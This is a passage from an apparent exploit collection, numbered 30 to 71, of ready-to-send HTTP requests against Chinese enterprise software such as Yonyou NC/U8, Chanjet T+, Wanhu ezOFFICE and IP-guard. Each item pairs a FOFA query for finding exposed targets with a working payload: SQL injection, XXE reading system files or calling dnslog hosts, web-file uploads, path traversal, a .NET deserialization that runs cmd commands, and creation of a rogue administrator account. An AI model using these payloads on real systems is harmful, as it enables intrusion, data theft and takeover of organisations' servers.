Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
123
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It executes a command that writes the specified string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the following endpoint:
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request:
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Ente customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate 脸爱云 face-pass smart management platform 1.0.55.0.0.1 permission bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability exists.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
